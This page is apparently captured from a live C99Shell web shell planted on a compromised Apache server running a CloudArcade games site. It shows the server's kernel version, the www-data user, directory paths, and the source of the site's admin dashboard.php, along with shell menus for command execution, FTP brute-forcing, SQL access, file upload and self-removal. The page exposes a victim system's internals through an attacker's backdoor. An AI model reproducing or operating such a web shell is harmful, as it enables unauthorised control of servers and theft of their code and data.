!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/www/html/gamesdaddy/cloudarcade/admin/core/   drwxr-xr-x
Free 13.2 GB of 57.97 GB (22.77%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     dashboard.php (2.87 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
$warning_list 
get_admin_warning();
if(!empty(
$warning_list)){
    echo(
'<div class="site-warning">');
    foreach (
$warning_list as $val) {
        echo 
'<div class="alert alert-warning alert-dismissible fade show" role="alert">'.$val.'<button type="button" class="close" data-dismiss="alert" aria-label="Close"><span aria-hidden="true">&times;</span></button></div>';
    }
    echo(
'</div>');
}
?>
<div class="update-info"></div>
<div class="row">
    <div class="col-lg-9">
        <div class="section">
            <select class="custom-select custom-select-sm stats-option" id="stats-option">
                <option value="week"><?php echo _t('Last %a days'7?></option>
                <option value="month"><?php echo _t('Last %a days'30?></option>
            </select>
            <h3 class="section-title"><?php echo _t('Statistics'?></h3 class="section-title">
            <div class="container-stats">
                <div class="chart-container" style="position: relative; height:40vh; width:80vw">
                    <canvas id="statistics"></canvas>
                </div>
            </div>
        </div>
        <div class="section">
            <h3 class="section-title"><?php echo _t('Top games'?></h3>
            <div class="table-responsive">
                <table class="table">
                    <thead>
                        <tr>
                            <th>#</th>
                            <th><?php _e('Game Name'?></th>
                            <th><?php _e('Played'?></th>
                            <th><?php _e('Category'?></th>
                            <th><?php _e('Likes'?></th>
                        </tr>
                    </thead>
                    <tbody>
                        <?php
                        $index 
0;
                        
$data get_game_list('popular'10);
                        
$games $data['results'];
                        foreach ( 
$games as $game ) {
                            
$index++;
                            
?>
                        <tr>
                            <th scope="row"><?php echo esc_int($index); ?></th>
                            <td>
                                <a href="<?php echo get_permalink('game'$game->slug?>" target="_blank"><?php echo esc_string($game->title); ?></a>
                            </td>
                            <td>
                                <?php echo esc_int($game->views); ?>
                            </td>
                            <td>
                                <?php echo '<span class="categories">'.esc_string($game->category).'</span>'?>
                            </td>
                            <td>
                                <?php
                                    $vote_percentage 
'- ';
                                    if(
$game->upvote+$game->downvote 0){
                                        
$vote_percentage floor(($game->upvote/($game->upvote+$game->downvote))*100);
                                    }
                                    echo 
'<div class="row">';
                                    echo 
'<div class="col-4">'.$vote_percentage.' %</div>';
                                    echo 
'<div class="col-4"><i class="fa fa-thumbs-up" aria-hidden="true"></i>'.esc_int($game->upvote).'</div><div class="col-4"><i class="fa fa-thumbs-down" aria-hidden="true"></i>'.esc_int($game->downvote).'</div>';
                                    echo 
'</div>';
                                
?>
                            </td>
                        </tr>
                        <?php ?>
                    </tbody>
                </table>
            </div>
        </div>
    </div>
    <div class="col-lg-3">
        <?php if(!ADMIN_DEMO) echo('<div class="section"><div class="official-info"></div></div>'?>
        <div class="section">
            <div class="quote-box">
                <div id="quote"></div>
            </div>
        </div>
    </div>
</div>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0531 ]--